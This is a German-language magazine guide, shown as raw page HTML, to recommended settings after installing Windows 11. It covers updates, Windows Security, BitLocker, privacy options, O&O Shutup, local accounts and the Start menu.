					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Sie finden die Einstellung in anderen Windows-Versionen auch in den Ordneroptionen auf der Registerkarte “Ansicht” bei “Erweiterungen bei bekannten Dateitypen ausblenden”. In diesem Fall müssen Sie die Option deaktivieren.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e05da206eb"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/dateierweiterungen-einblenden-02.png" alt="Ansicht-Explorer" class="wp-image-2279516" width="377" height="483" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Bei den Ordneroptionen können Sie dann auch gleich auf der Registerkarte “Allgemein” bei “Datei-Explorer öffnen für” die Option “Dieser PC” auswählen. In diesem Fall startet der Explorer mit der Ansicht der Laufwerke, nicht mit der selten gewünschten “Start-Ansicht”. Die Start-Ansicht können Sie in diesem Fall auch mit einem einzelnen Klick auf “Start” links oben öffnen.</p>



<h2 class="wp-block-heading toc">Windows-Update anpassen</h2>



<p>Nach der Aktualisierung zu Windows 11 oder der Installation des Betriebssystems sollten Sie in den Einstellungen zunächst zu “Windows Update” wechseln. Generell sollten Sie zunächst sicherstellen, dass im oberen Bereich die Meldung “Sie sind auf dem neusten Stand erscheint”. Klicken Sie dennoch auf “Nach Updates suchen” und stellen Sie sicher, dass wirklich alle Updates installiert sind. Über diesen Weg aktualisiert Windows auch die Definitionsdateien des Malwareschutzes.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e05da20e4a"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/windows-update-01.png" alt="Windows-Update" class="wp-image-2279518" width="1024" height="757" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Überdies kann es sinnvoll sein, die Option “Erhalten Sie die neuesten Updates, sobald sie verfügbar sind” zu aktivieren. Das stellt sicher, dass Ihr Windows-System Updates schneller erhält als andere Nutzer. Microsoft verteilt viele Aktualisierungen in Wellen. Aktivieren Sie diese Option, können Sie sich in den Wellen etwas vordrängeln.</p>



<p>Klicken Sie darüber hinaus noch auf “Erweiterte Optionen” und aktivieren Sie “Updates für andere Microsoft-Produkte erhalten”. Dadurch stellen Sie sicher, dass auch die anderen Produkte auf Ihrem PC immer aktuell sind.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e05da213d6"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/windows-update-02.png" alt="Windows-Updates anpassen" class="wp-image-2279519" width="1024" height="763" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>An dieser Stelle kann es auch sinnvoll sein bei “Nutzungszeit” festzulegen, wann Sie am PC arbeiten. Das stellt sicher, dass Windows nach der Installation von Updates nicht innerhalb dieser Zeit startet.</p>



<h2 class="wp-block-heading toc">Wichtig: Malware-Schutz</h2>



<p>Rufen Sie nach der Installation von Windows 11 die App “Windows-Sicherheit” aus dem Startmenü auf. Hier sollte bei allen Einstellungen ein grünes Icon mit einem Haken zu sehen sein. Ist das nicht der Fall, überprüfen Sie den Bereich, indem Sie auf das jeweilige Icon klicken.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e05da21975"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/sicherheit-01.png" alt="Windows-Sicherheit-01" class="wp-image-2279521" width="922" height="777" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Bei “Gerätesicherheit” sollten Sie darauf achten, dass die Option “Speicher-Integrität” bei “Kernisolierung → Details zu Kernisolierung” aktiviert ist.  Das verhindert erfolgreiche Angriffe durch Malware. Lässt sich diese Option nicht deaktivieren, liegt das an einem veralteten und damit unsicheren Treiber.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e05da21ef1"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/kern-isolierung.png" alt="Aktivieren der Kern-Isolierung" class="wp-image-2279524" width="923" height="711" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Außerdem sollten Sie darauf achten, dass “Microsoft-Sperrliste gefährdeter Treiber” aktiviert ist. Dadurch lassen sich unsichere Treiber blockieren, über die Angreifer Malware auf dem System einschleusen können.</p>



<h2 class="wp-block-heading toc">Viren- und Bedrohungsschutz anpassen</h2>



<p>In der App Windows-Sicherheit sollten Sie nach der Installation noch zu “Viren- und Bedrohungsschutz” wechseln. Klicken Sie bei “Einstellungen für Viren- und Bedrohungsschutz” auf “Einstellungen verwalten” und achten Sie darauf, dass hier alle Optionen eingeschaltet sind, primär “Echtzeitschutz”, “Cloudbasierter-Schutz” und “Automatische Übermittlung von Beispielen”.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e05da224dc"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/malware-schutz.png" alt="Malware-Schutz in Windows optimieren" class="wp-image-2279525" width="1024" height="937" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<h2 class="wp-block-heading toc">Schutzupdates für den Malware-Scanner</h2>



<p>Wichtig ist zudem, dass Sie bei “Updates für Viren- und Bedrohungsschutz” sicherstellen, dass die Sicherheitsinformationen vom aktuellen Tag sind. Mit “Schutzupdates” und dann “Nach Updates suchen” aktualisieren Sie diese direkt.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e05da22a2c"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/schutzupdates.png" alt="Schutzupdates in Windows" class="wp-image-2279526" width="883" height="549" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Nutzen Sie einen externen Virenschutz, sind diese Anpassungen nicht notwendig, da dieser den internen Virenschutz in Windows deaktiviert. </p>



<h2 class="wp-block-heading toc">Windows-Aktivierung prüfen</h2>



<p>In den Einstellungen finden Sie über “System → Aktivierung” die Option, ob Windows aktiviert ist. Ohne Aktivierung stellt das Betriebssystem nach einiger Zeit den Betrieb ein und viele Einstellungen sind nicht verfügbar. Hier sehen Sie, ob die Aktivierung funktioniert und können bei Bedarf über “Ändern” Ihren Produktschlüssel für Windows 10 oder Windows 11 neu eintragen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e05da2305b"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/aktivierung.png" alt="Windows-Aktivierung" class="wp-image-2279527" width="899" height="667" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Sie erreichen diesen Bereich auch durch Eingabe von “slui” im Suchfeld der Taskleiste.</p>



<h2 class="wp-block-heading toc">Sind alle Treiber installiert?</h2>



<p>Über den Befehl “devmgmt.msc”, den Sie im Suchfeld der Taskleiste eingeben, sehen Sie, ob für alle vorhandenen Geräte im PC auch alle Treiber installiert sind. Wenn hier noch unbekannte oder andere Geräte angezeigt werden, sollten Sie sich beim Hersteller den aktuellen Treiber besorgen und diesen installieren.</p>



<h2 class="wp-block-heading toc">Laufwerksverschlüsselung aktivieren</h2>



<p>Vor allem auf Notebooks sollten Sie darauf achten, dass Sie Bitlocker zur Laufwerksverschlüsselung verwenden. Geben Sie dazu “bitlocker” im Suchfeld der Taskleiste ein und aktivieren Sie den Schutz.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e05da2367c"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/bitlocker.png" alt="Bitlocker schützt Windows" class="wp-image-2279528" width="920" height="583" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Bitlocker steht in Windows 11 Pro und Enterprise zur Verfügung. In Windows 11 Home können Sie stattdessen die Geräteverschlüsselung verwenden. Diese ist in den Einstellungen von Windows 11 zu finden.</p>



<h2 class="wp-block-heading toc">Datenschutz überprüfen</h2>



<p>Wer nach der Installation Bedenken über die getroffenen <strong>Datenschutzeinstellungen </strong>hat, sollte diese prüfen und bei Bedarf ändern.</p>



<p>Dazu rufen Sie die „Einstellungen“- App auf, was am schnellsten mit der Tastenkombination Win-I geht. Die wichtigsten Optionen finden Sie unter „Datenschutz und Sicherheit“. </p>



<p>Es empfiehlt sich, <strong>alle Optionen einmal durchzugehen</strong> und das nach einem Funktionsupgrade zu wiederholen. Teilweise werden Optionen bei einem Upgrade neu gesetzt, außerdem erfolgt nach manchen Funktionsupgrades eine Abfrage der Basiseinstellungen wie bei der Neuinstallation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e05da23ec7"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_1.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Auf die Finger geschaut: Welche Daten Ihr PC an Microsoft sendet, lässt sich herausfinden. Bedenkliches sollte nicht dabei sein, aber die Übermittlung ist vielleicht trotzdem unerwünscht." class="wp-image-2934451" width="1200" height="713" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Auf die Finger geschaut: Welche Daten Ihr PC an Microsoft sendet, lässt sich herausfinden. Bedenkliches sollte nicht dabei sein, aber die Übermittlung ist vielleicht trotzdem unerwünscht.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Im Vergleich zu Windows 10 sind die Optionen in mehr Rubriken unterteilt und wirken dadurch unübersichtlicher. Sie finden aber die Rubriken wieder, die Sie schon von der Neuinstallation kennen, etwa „Mein Gerät suchen“, „Freihand- und Eingabeanpassung“ sowie „Diagnose und Feedback“.</p>



<p>Letztere bietet die Funktion „Diagnosedaten anzeigen“ für alle, die es genauer wissen wollen. Ist die Option aktiviert, führt ein Klick auf „Diagnosedatenanzeige öffnen“ erst einmal in den Microsoft Store, über den Sie die App Diagnosedatenanzeige installieren müssen. Die zeigt Ihnen dann die gesammelten Daten an. Die Liste ist umfangreich und nicht einfach zu analysieren. </p>



<p>Man kann aber zumindest ermitteln, ob persönliche Daten enthalten sind oder nicht.</p>



<p><strong>App-Berechtigungen: </strong>Herkömmliche Desktop-Anwendungen haben Zugriff auf alle Ordner und Geräte, auf die auch der Nutzer Zugriff hat. Wenn ein Programm administrative Rechte anfordert, ist fast alles möglich. </p>



<p>Bei Apps aus dem Microsoft Store informiert Sie die Download-Seite über die erforderlichen Berechtigungen. Hier sollte man skeptisch werden, etwa wenn eine App die Kamera nutzen möchte, obwohl das für deren Aufgabe nicht nötig ist.</p>



<p>Die Zugriffsrechte lassen sich auch nach der Installation prüfen und genau einstellen. Dazu gehen Sie in den „Einstellungen“ auf „Datenschutz &amp; Sicherheit“ und wählen weiter unten unter „App-Berechtigungen“ eine Rubrik wie „Kamera“, „Kontakte“ oder „Bilder“. </p>



<p>Im jeweiligen Abschnitt sehen Sie, welcher App die Nutzung beziehungsweise der Zugriff erlaubt ist. Bei den Standard-Apps von Microsoft besteht kein Handlungsbedarf. Sind weitere Apps installiert, sollten Sie prüfen, ob unnötige Berechtigungen vergeben sind.</p>



<div class="wp-block-idg-base-theme-box-text inline-box">
<h2 class="wp-block-heading">Datenschutzeinstellungen mit einem Tool anpassen</h2>



<p>Das Tool <a href="https://www.oo-software.com/de/shutup10" target="_blank" rel="noreferrer noopener">O&amp;O Shutup</a> bietet einen einfacheren Zugang zu den Datenschutzeinstellungen. Nach dem Start gehen Sie zuerst auf „Datei –› Einstellungen exportieren“ und speichern die aktuellen Einstellungen. Danach legen Sie zur Sicherheit über „Aktionen –› Systemwiederherstellungspunkt erzeugen“ ein Backup an.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e05da24920"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_2.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Schnelleinstellungen: O&amp;O Shutup listet alle für den Datenschutz relevanten Einstellungen auf. Deaktivieren Sie unnötige Optionen, was im Tool mit einem Klick geschehen kann." class="wp-image-2934461" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Schnelleinstellungen: O&amp;O Shutup listet alle für den Datenschutz relevanten Einstellungen auf. Deaktivieren Sie unnötige Optionen, was im Tool mit einem Klick geschehen kann.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>O&amp;O Shutup zeigt zwei Registerkarten, über die Sie zwischen den Einstellungen „Aktueller Benutzer“ und „Gesamter Rechner“ umschalten können. Per Klick auf „Aktionen –› Nur empfohlene Einstellungen anwenden“ passen Sie alle Optionen auf der gewählten Registerkarte für optimalen Datenschutz an. </p>



<p>Wer sich mehr Informationen wünscht, klickt die einzelnen Einstellungen an, wodurch das Tool einen kurzen Hilfetext anzeigt. Vorsicht ist bei den Optionen mit dem Zusatz „bedingt“ geboten. Der Hilfetext weist auf mögliche Nebenwirkungen hin. Steht in der Spalte „Empfohlen“ der Hinweis „Nein“, ändern Sie die Einstellung besser nicht.</p>
</div>



<h2 class="wp-block-heading toc">Windows auf ein lokales Konto umstellen</h2>



<p>Windows 11 erfordert bei der Neuinstallation zwingend die Anmeldung mit einem Microsoft-Konto. Wer es benötigt, etwa für Onedrive, Cloudfunktionen oder bestimmte Apps, sollte es dabei belassen. </p>



<p>Wenn nicht, können Sie für mehr Datenschutz auch auf ein lokales Konto umsteigen. Dazu gehen Sie in den „Einstellungen“ auf „Konten –› Ihre Infos“ und klicken unter „Kontoeinstellungen“ auf „Stattdessen mit einem lokalen Konto anmelden“. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e05da252be"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_3.jpg?quality=50&amp;strip=all" alt="Weniger Microsoft: Wenn Sie ein Microsoft- Konto nicht zwingend benötigen, können Sie nach der Windows- Installation problemlos auf ein lokales Konto umsteigen." class="wp-image-2934463" width="800" height="436" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Weniger Microsoft: Wenn Sie ein Microsoft- Konto nicht zwingend benötigen, können Sie nach der Windows- Installation problemlos auf ein lokales Konto umsteigen.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Klicken Sie auf „Weiter“ und bestätigen Sie mit Ihrem Kennwort. Danach legen Sie Benutzernamen, Passwort und einen Kennworthinweis fest, klicken auf „Weiter“ und dann auf „Abmelden und fertig stellen“.</p>



<p>Gelegentlich zeigt Windows eine Meldung an, die Sie zum Umstieg auf ein Microsoft-Konto bewegen soll. Um das zu verhindern, gehen Sie in den „Einstellungen“ auf „System –› Benachrichtigungen und Aktionen“ und entfernen das Häkchen vor „Möglichkeit zum Abschließen der Einrichtung meines Geräts für die optimale Nutzung von Windows vorschlagen“.</p>



<h2 class="wp-block-heading toc">Startmenü anpassen</h2>



<p>Das Startmenü ist eine <strong>Windows-Dauerbaustelle</strong>. Mit dem von Windows 7 waren die meisten Nutzer zufrieden, die Kacheln in Windows 8 haben wahrscheinlich kaum jemandem gefallen, und das von Windows 10 traf auch nicht die ungeteilte Begeisterung. </p>



<p>Seit der ersten Veröffentlichung von Windows 11 hat Microsoft das Startmenü mehrfach überarbeitet. Der grundsätzliche Aufbau ist jedoch gleich geblieben. </p>



<p>Das Menü öffnet sich standardmäßig in der Mitte des Bildschirms und zeigt ProgrammIcons unter „Angeheftet“. Darunter gibt es die Kategorie „Empfohlen“. Ein Klick auf die Schaltfläche „Alle“ führt zu einer alphabetischen Liste aller Apps und Programme.</p>


